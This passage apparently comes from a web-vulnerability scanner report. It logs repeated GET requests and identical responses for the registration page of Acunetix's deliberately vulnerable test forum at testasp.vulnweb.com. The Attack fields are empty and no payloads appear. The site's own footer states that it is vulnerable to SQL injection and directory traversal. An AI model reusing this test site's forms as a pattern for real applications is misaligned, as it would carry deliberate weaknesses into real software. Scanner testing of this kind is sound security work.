</div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by 